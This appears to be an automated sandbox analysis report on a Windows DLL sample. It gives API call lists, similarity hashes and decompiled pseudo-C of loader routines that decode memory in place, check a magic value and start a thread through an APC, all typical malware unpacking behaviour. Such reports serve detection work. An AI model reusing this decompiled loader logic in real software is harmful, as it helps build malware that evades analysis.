                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00001000,00000004,6DE723A2), ref: 6DE72679
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2), ref: 6DE72746
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2,?), ref: 6DE7279C
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE727B8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.481447571.000000006DE71000.00000040.00020000.sdmp, Offset: 6DE71000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2574235972-0
                                                                                                                                                                                                                                                          • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction ID: 0efb1801fed34ec62a7a663e9c3cf7a36147c5d7f49471c05b40fc200e059d46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D17E362002819FDF61CF54C880F5177A6FF58714B1A45A4EE0AAF75BEB31B850DB62
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: U$w
                                                                                                                                                                                                                                                          • API String ID: 0-2864656496
                                                                                                                                                                                                                                                          • Opcode ID: f21f667172b62d75108f8e6317657a50b5d58d067fcdd9681b0becc889bc5db2
                                                                                                                                                                                                                                                          • Instruction ID: 5e15dc2ac86ab0ac5de9e1fe4d2349b3396479558563127ca13d02cd2a63a53e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f21f667172b62d75108f8e6317657a50b5d58d067fcdd9681b0becc889bc5db2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CA29E715083608FCB84CF2ED89077ABBF2BB8B324F154A2EE49897391D7759608DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                          				char _t9;
                                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                          				_t9 = _a8;
                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                                                                          					_t10 = InterlockedDecrement(0x6ddf4188);
                                                                                                                                                                                                                                                          					__eflags = _t10;
                                                                                                                                                                                                                                                          					if(_t10 == 0) {
                                                                                                                                                                                                                                                          						__eflags =  *0x6ddf418c;
                                                                                                                                                                                                                                                          						if( *0x6ddf418c != 0) {
                                                                                                                                                                                                                                                          							_t36 = 0x2328;
                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                          								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                          								__eflags =  *0x6ddf4198;
                                                                                                                                                                                                                                                          								if( *0x6ddf4198 == 0) {
                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                          								__eflags = _t36;
                                                                                                                                                                                                                                                          								if(_t36 > 0) {
                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							CloseHandle( *0x6ddf418c);
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						HeapDestroy( *0x6ddf4190);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					if(_t9 == 1 && InterlockedIncrement(0x6ddf4188) == 1) {
                                                                                                                                                                                                                                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                          						_t41 = _t18;
                                                                                                                                                                                                                                                          						 *0x6ddf4190 = _t18;
                                                                                                                                                                                                                                                          						if(_t18 == 0) {
                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							 *0x6ddf41b0 = _a4;
                                                                                                                                                                                                                                                          							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                          							_push( &_a8);
                                                                                                                                                                                                                                                          							_t23 = E6DDF1CA4(E6DDF1D32, E6DDF1EE0(_a12, 1, 0x6ddf4198, _t41));
                                                                                                                                                                                                                                                          							 *0x6ddf418c = _t23;
                                                                                                                                                                                                                                                          							if(_t23 == 0) {
                                                                                                                                                                                                                                                          								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                          0x6ddf1e07
                                                                                                                                                                                                                                                          0x6ddf1e13
                                                                                                                                                                                                                                                          0x6ddf1e15
                                                                                                                                                                                                                                                          0x6ddf1e18
                                                                                                                                                                                                                                                          0x6ddf1e8e
                                                                                                                                                                                                                                                          0x6ddf1e94
                                                                                                                                                                                                                                                          0x6ddf1e96
                                                                                                                                                                                                                                                          0x6ddf1e98
                                                                                                                                                                                                                                                          0x6ddf1e9e
                                                                                                                                                                                                                                                          0x6ddf1ea0
                                                                                                                                                                                                                                                          0x6ddf1ea5
                                                                                                                                                                                                                                                          0x6ddf1ea8
                                                                                                                                                                                                                                                          0x6ddf1eb3
                                                                                                                                                                                                                                                          0x6ddf1eb5
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1eb7
                                                                                                                                                                                                                                                          0x6ddf1eba
                                                                                                                                                                                                                                                          0x6ddf1ebc
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1ebc
                                                                                                                                                                                                                                                          0x6ddf1ec4
                                                                                                                                                                                                                                                          0x6ddf1ec4
                                                                                                                                                                                                                                                          0x6ddf1ed0
                                                                                                                                                                                                                                                          0x6ddf1ed0
                                                                                                                                                                                                                                                          0x6ddf1e1a
                                                                                                                                                                                                                                                          0x6ddf1e1b
                                                                                                                                                                                                                                                          0x6ddf1e3b
                                                                                                                                                                                                                                                          0x6ddf1e41
                                                                                                                                                                                                                                                          0x6ddf1e43
                                                                                                                                                                                                                                                          0x6ddf1e48
                                                                                                                                                                                                                                                          0x6ddf1e84
                                                                                                                                                                                                                                                          0x6ddf1e84
                                                                                                                                                                                                                                                          0x6ddf1e4a
                                                                                                                                                                                                                                                          0x6ddf1e52
                                                                                                                                                                                                                                                          0x6ddf1e59
                                                                                                                                                                                                                                                          0x6ddf1e63
                                                                                                                                                                                                                                                          0x6ddf1e6f
                                                                                                                                                                                                                                                          0x6ddf1e76
                                                                                                                                                                                                                                                          0x6ddf1e7b
                                                                                                                                                                                                                                                          0x6ddf1e80
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1e80
                                                                                                                                                                                                                                                          0x6ddf1e7b
                                                                                                                                                                                                                                                          0x6ddf1e48
                                                                                                                                                                                                                                                          0x6ddf1e1b
                                                                                                                                                                                                                                                          0x6ddf1edd

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(6DDF4188), ref: 6DDF1E26
                                                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6DDF1E3B
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: CreateThread.KERNELBASE ref: 6DDF1CBB
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DDF1CD0
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: GetLastError.KERNEL32(00000000), ref: 6DDF1CDB
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6DDF1CE5
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: CloseHandle.KERNEL32(00000000), ref: 6DDF1CEC
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: SetLastError.KERNEL32(00000000), ref: 6DDF1CF5
                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(6DDF4188), ref: 6DDF1E8E
                                                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 6DDF1EA8
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 6DDF1EC4
                                                                                                                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 6DDF1ED0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2110400756-0
                                                                                                                                                                                                                                                          • Opcode ID: dc817ed16920f9fd1f85b76d3246150d4a1b48f76d596184586828b4f9add3f9
                                                                                                                                                                                                                                                          • Instruction ID: b92a8a551d8751c7487def5bbe9b649440a82ad7219eb5dd8a4bae76fd84ed5c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc817ed16920f9fd1f85b76d3246150d4a1b48f76d596184586828b4f9add3f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB2184B1A40206EFEB00BFE9ED84B6A7BB8FB5A365713412AF515D3141E730C906CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF1CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                          				long _t6;
                                                                                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6ddf41cc, 0, _a12); // executed
                                                                                                                                                                                                                                                          				_t13 = _t4;
                                                                                                                                                                                                                                                          				if(_t13 != 0) {
                                                                                                                                                                                                                                                          					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                          					if(_t6 == 0) {
                                                                                                                                                                                                                                                          						_t11 = GetLastError();
                                                                                                                                                                                                                                                          						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                          						CloseHandle(_t13);
                                                                                                                                                                                                                                                          						_t13 = 0;
                                                                                                                                                                                                                                                          						SetLastError(_t11);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _t13;
                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                          0x6ddf1cbb
                                                                                                                                                                                                                                                          0x6ddf1cc1
                                                                                                                                                                                                                                                          0x6ddf1cc5
                                                                                                                                                                                                                                                          0x6ddf1cd0
                                                                                                                                                                                                                                                          0x6ddf1cd8
                                                                                                                                                                                                                                                          0x6ddf1ce1
                                                                                                                                                                                                                                                          0x6ddf1ce5
                                                                                                                                                                                                                                                          0x6ddf1cec
                                                                                                                                                                                                                                                          0x6ddf1cf3
                                                                                                                                                                                                                                                          0x6ddf1cf5
                                                                                                                                                                                                                                                          0x6ddf1cfb
                                                                                                                                                                                                                                                          0x6ddf1cd8
                                                                                                                                                                                                                                                          0x6ddf1cff

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE ref: 6DDF1CBB
                                                                                                                                                                                                                                                          • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DDF1CD0
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 6DDF1CDB
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 6DDF1CE5
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6DDF1CEC
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6DDF1CF5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3832013932-0
                                                                                                                                                                                                                                                          • Opcode ID: 6ad7e71c6ce5245b9fa70baa9a7502c0bd0a9912b45aef6acdb66625d2892e71
                                                                                                                                                                                                                                                          • Instruction ID: c8e20a197b87dae5aa9091511ce51577caa7cb44e8634b6a632d6fccfe3b2d2b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ad7e71c6ce5245b9fa70baa9a7502c0bd0a9912b45aef6acdb66625d2892e71
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F01276245621BBEB117FA0AC0CF5BBF79FB0A755F024405FA0591151C72188119BAA
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                                          • Opcode ID: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction ID: 2b87e4c9354f9012ce1a144f5639eeef7f517a0465a234262c58401ed5d7a458
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0219471D04739FBDB266E54CC40ABF3A79EB85698F234119F81467610CB308E03CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6DE37387
                                                                                                                                                                                                                                                            • Part of subcall function 6DE37BA4: RtlInitializeSListHead.NTDLL(6DE7C780), ref: 6DE37BA9
                                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DE373F1
                                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 6DE3743B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 2097537958-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction ID: af419aaefb9eeaa3da4893b8e8e0b2197aa4f62a32966191de4adaa6bca7c65f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91218E32A4C232DADB05BBB4A9047BC7BB19F0632DF33845DDA807B2C1DF615545C665
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                          			E6DDF15A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                          				unsigned int _v12;
                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t77 =  *0x6ddf41b0;
                                                                                                                                                                                                                                                          				_t39 = E6DDF1A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                          				_v16 = _t39;
                                                                                                                                                                                                                                                          				if(_t39 == 0) {
                                                                                                                                                                                                                                                          					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                          					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                          					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                          					_v36 = _t78;
                                                                                                                                                                                                                                                          					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                          					_v24 = _t46;
                                                                                                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                                                                                                          						_v16 = 8;
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t61 = 0;
                                                                                                                                                                                                                                                          						if(_t59 <= 0) {
                                                                                                                                                                                                                                                          							_t47 =  *0x6ddf41cc;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							_t66 = _a4;
                                                                                                                                                                                                                                                          							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                          							_t11 = _t66 + 0x6ddf5137; // 0x6ddf5137
                                                                                                                                                                                                                                                          							_v28 = _t50;
                                                                                                                                                                                                                                                          							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                          							_v8 = _t78;
                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                                          								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                          								_t80 = _t19;
                                                                                                                                                                                                                                                          								E6DDF1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                          								_t64 = _v32;
                                                                                                                                                                                                                                                          								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                          								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                          								_t61 = _t80;
                                                                                                                                                                                                                                                          								 *0x6ddf41cc = _t47;
                                                                                                                                                                                                                                                          								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t50 = _v28;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                          							_v16 = 0xc;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v16;
                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                          0x6ddf15aa
                                                                                                                                                                                                                                                          0x6ddf15ba
                                                                                                                                                                                                                                                          0x6ddf15c1
                                                                                                                                                                                                                                                          0x6ddf15c4
                                                                                                                                                                                                                                                          0x6ddf15d9
                                                                                                                                                                                                                                                          0x6ddf15e0
                                                                                                                                                                                                                                                          0x6ddf15e5
                                                                                                                                                                                                                                                          0x6ddf15f6
                                                                                                                                                                                                                                                          0x6ddf15f9
                                                                                                                                                                                                                                                          0x6ddf1601
                                                                                                                                                                                                                                                          0x6ddf1604
                                                                                                                                                                                                                                                          0x6ddf16ae
                                                                                                                                                                                                                                                          0x6ddf160a
                                                                                                                                                                                                                                                          0x6ddf160a
                                                                                                                                                                                                                                                          0x6ddf160e
                                                                                                                                                                                                                                                          0x6ddf1676
                                                                                                                                                                                                                                                          0x6ddf1610
                                                                                                                                                                                                                                                          0x6ddf1610
                                                                                                                                                                                                                                                          0x6ddf1613
                                                                                                                                                                                                                                                          0x6ddf1615
                                                                                                                                                                                                                                                          0x6ddf161d
                                                                                                                                                                                                                                                          0x6ddf1620
                                                                                                                                                                                                                                                          0x6ddf1623
                                                                                                                                                                                                                                                          0x6ddf162b
                                                                                                                                                                                                                                                          0x6ddf1633
                                                                                                                                                                                                                                                          0x6ddf1634
                                                                                                                                                                                                                                                          0x6ddf1635
                                                                                                                                                                                                                                                          0x6ddf163c
                                                                                                                                                                                                                                                          0x6ddf163c
                                                                                                                                                                                                                                                          0x6ddf1650
                                                                                                                                                                                                                                                          0x6ddf1655
                                                                                                                                                                                                                                                          0x6ddf165e
                                                                                                                                                                                                                                                          0x6ddf1665
                                                                                                                                                                                                                                                          0x6ddf1668
                                                                                                                                                                                                                                                          0x6ddf166c
                                                                                                                                                                                                                                                          0x6ddf1671
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1628
                                                                                                                                                                                                                                                          0x6ddf1628
                                                                                                                                                                                                                                                          0x6ddf1673
                                                                                                                                                                                                                                                          0x6ddf1680
                                                                                                                                                                                                                                                          0x6ddf1695
                                                                                                                                                                                                                                                          0x6ddf1682
                                                                                                                                                                                                                                                          0x6ddf168b
                                                                                                                                                                                                                                                          0x6ddf1690
                                                                                                                                                                                                                                                          0x6ddf16a6
                                                                                                                                                                                                                                                          0x6ddf16a6
                                                                                                                                                                                                                                                          0x6ddf16b5
                                                                                                                                                                                                                                                          0x6ddf16bb

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6DDF15F9
                                                                                                                                                                                                                                                          • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6DDF17EC), ref: 6DDF168B
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6DDF16A6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                          • String ID: Mar 26 2021
                                                                                                                                                                                                                                                          • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                          • Opcode ID: c4eff99be9e623b0dfac6647211ac520c38b53184d3b917477a5fc777b4bf76f
                                                                                                                                                                                                                                                          • Instruction ID: 951afd216082edf69e3484bdea4701d603ac72dad9fdee8c97cbd943b8fd507c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4eff99be9e623b0dfac6647211ac520c38b53184d3b917477a5fc777b4bf76f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 463154B1E4021ADFDF01EF99D980BDEB7B5FF49304F158169E904AB241D771AA068F90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                          			E6DDF1D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                          				long _t3;
                                                                                                                                                                                                                                                          				int _t4;
                                                                                                                                                                                                                                                          				int _t9;
                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                          				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                                                          					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t4 = E6DDF17A7(_a4); // executed
                                                                                                                                                                                                                                                          				_t9 = _t4;
                                                                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                                                                          					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                          				return _t9;
                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                          0x6ddf1d3b
                                                                                                                                                                                                                                                          0x6ddf1d40
                                                                                                                                                                                                                                                          0x6ddf1d4e
                                                                                                                                                                                                                                                          0x6ddf1d53
                                                                                                                                                                                                                                                          0x6ddf1d53
                                                                                                                                                                                                                                                          0x6ddf1d59
                                                                                                                                                                                                                                                          0x6ddf1d5e
                                                                                                                                                                                                                                                          0x6ddf1d62
                                                                                                                                                                                                                                                          0x6ddf1d66
                                                                                                                                                                                                                                                          0x6ddf1d66
                                                                                                                                                                                                                                                          0x6ddf1d70
                                                                                                                                                                                                                                                          0x6ddf1d79

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 6DDF1D35
                                                                                                                                                                                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6DDF1D40
                                                                                                                                                                                                                                                          • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6DDF1D53
